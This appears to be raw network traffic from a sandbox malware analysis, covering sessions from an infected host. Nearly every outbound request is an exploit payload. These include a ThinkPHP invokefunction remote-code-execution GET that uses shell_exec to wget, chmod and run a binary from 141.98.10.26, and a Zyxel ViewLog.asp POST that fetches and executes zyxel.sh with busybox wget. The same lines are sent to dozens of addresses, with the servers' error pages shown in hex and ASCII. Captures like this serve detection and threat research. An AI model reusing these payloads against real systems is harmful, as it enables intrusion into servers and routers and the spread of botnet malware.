65 65 64 20 74 6f 0a 20 20 20 20 61 64 6a 75 73 74 20 79 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 74 74 69 6e 67 73 2e 3c 2f 66 6f 6e 74 3e 3c 2f 74 64 3e 0a 20 20 3c 2f 74 72 3e 0a 20 20 3c 74 72 3e 0a 20 20 20 20 3c 74 64 20 69 64 3d 22 74 61 62 6c 65 50 72 6f 70 73 57 69 64 74 68 22 20 77 69 64 74 68 3d 22 34 30 30 22 20 63 6f 6c 73 70 61 6e 3d 22 32 22 3e 3c 66 6f 6e 74 20 69 64 3d 22 4c 49 44 31 22 0a 20 20 20 20 73 74 79 6c 65 3d 22 43 4f 4c 4f 52 3a 20 62 6c 61 63 6b 3b 20 46 4f 4e 54 3a 20 38 70 74 2f 31 31 70 74 20 76 65 72 64 61 Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"><html><head><style>a:link{font:8pt/11pt verdana; color:red}a:visited{font:8pt/11pt verdana; color:#4e4e4e}</style><title>Cannot find server</title></head><SCRIPT>function doNetDetect() {saOC.NETDetectNextNavigate();location.reload();}</SCRIPT><body bgcolor="white"><table width="400" cellpadding="3" cellspacing="5"> <tr> <td id="tableProps" valign="center" align="left" bgcolor=red>         </td> <td id="tableProps2" align="left" valign="middle" width="360"><font id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">The page cannot be displayed</font> </td> </tr> <tr> <td id="tablePropsWidth" width="400" colspan="2"><font style="COLOR: black; FONT: 8pt/11pt verdana">The page you are looking for is currently unavailable. The Web site might be experiencing technical difficulties, or you may need to adjust your browser settings.</font></td> </tr> <tr> <td id="tablePropsWidth" width="400" colspan="2"><font id="LID1" style="COLOR: black; FONT: 8pt/11pt verda
Nov 22, 2023 08:39:48.096849918 CET	14325	IN	Data Raw: 6e 61 22 3e 3c 68 72 20 63 6f 6c 6f 72 3d 22 23 43 30 43 30 43 30 22 20 6e 6f 73 68 61 64 65 3e 0a 20 20 20 20 3c 70 20 69 64 3d 22 4c 49 44 32 22 3e 50 6c 65 61 73 65 20 74 72 79 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 3a 3c 2f 70 3e 3c 75 6c Data Ascii: na"><hr color="#C0C0C0" noshade> <p id="LID2">Please try the following:</p><ul> <li id="instructionsText1">Click the <a href="javascript:location.reload()" target="_self">Refresh</a> button, or try again later.<br> </li>
Nov 22, 2023 08:39:48.096862078 CET	14325	IN	Data Raw: 74 20 69 74 2e 20 0a 20 20 20 20 20 20 20 43 68 65 63 6b 20 79 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 74 74 69 6e 67 73 20 66 6f 72 20 53 53 4c 20 32 2e 30 2c 20 53 53 4c 20 33 2e 30 2c 20 54 4c 53 20 31 2e 30 2c 20 50 43 54 20 31 2e 30 2e 20 Data Ascii: t it. Check your browser settings for SSL 2.0, SSL 3.0, TLS 1.0, PCT 1.0. </li> <li id="list3">Click the <a href="javascript:history.back(1)"> Back</a> button to try another link. </li> </ul> <p

Session ID	Source IP	Source Port	Destination IP	Destination Port
710	192.168.2.23	35426	112.213.98.136	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:47.826126099 CET	14318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
711	192.168.2.23	47008	88.99.239.18	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:47.996303082 CET	14320	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:48.185395002 CET	14328	IN	HTTP/1.1 400 Bad Request Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
712	192.168.2.23	56722	88.99.88.202	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:47.996402979 CET	14320	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:48.185094118 CET	14327	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 22 Nov 2023 07:39:48 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
713	192.168.2.23	42492	88.198.112.253	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:47.996437073 CET	14321	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
714	192.168.2.23	58396	88.221.170.134	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:48.014513969 CET	14322	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:48.221637964 CET	14329	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Wed, 22 Nov 2023 07:39:48 GMT Date: Wed, 22 Nov 2023 07:39:48 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 35 62 66 30 31 30 30 32 26 23 34 36 3b 31 37 30 30 36 33 38 37 38 38 26 23 34 36 3b 34 36 30 35 38 63 66 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.5bf01002.1700638788.46058cf</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
715	192.168.2.23	40730	95.163.120.132	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:49.498558998 CET	14485	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:49.726418972 CET	14491	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 22 Nov 2023 07:39:49 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
716	192.168.2.23	45096	95.101.188.154	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:49.694897890 CET	14489	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:49.890470982 CET	14494	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Wed, 22 Nov 2023 07:39:49 GMT Date: Wed, 22 Nov 2023 07:39:49 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 64 30 62 31 35 30 32 26 23 34 36 3b 31 37 30 30 36 33 38 37 38 39 26 23 34 36 3b 63 66 64 64 30 38 32 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.4d0b1502.1700638789.cfdd082</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
717	192.168.2.23	52314	95.171.21.188	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:49.702445984 CET	14490	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:49.905836105 CET	14495	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 22 Nov 2023 07:39:49 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
718	192.168.2.23	43850	95.98.55.2	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:49.886820078 CET	14493	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:50.079241037 CET	14558	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 22 Nov 2023 07:39:49 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
719	192.168.2.23	34330	95.163.217.35	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:49.905993938 CET	14496	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:50.112946033 CET	14559	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 22 Nov 2023 07:39:50 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
720	192.168.2.23	39486	95.164.11.209	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:49.927589893 CET	14496	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:50.163433075 CET	14563	IN	HTTP/1.1 400 Bad Request Server: nginx/1.24.0 Date: Wed, 22 Nov 2023 07:39:50 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.24.0</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
721	192.168.2.23	39898	31.136.26.230	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:50.131028891 CET	14560	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:50.722978115 CET	14663	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:51.874800920 CET	14781	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:54.370565891 CET	15112	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:58.977806091 CET	15626	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:08.192522049 CET	16728	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:27.389905930 CET	19071	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:41:04.248799086 CET	19781	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
722	192.168.2.23	48012	62.29.80.166	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:51.557446003 CET	14772	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
723	192.168.2.23	41612	31.200.124.65	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:51.558080912 CET	14772	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
724	192.168.2.23	60874	94.120.220.64	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:51.569103956 CET	14773	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
725	192.168.2.23	41586	94.120.107.54	8080

Timestamp	kBytes transferred	Direction	Data
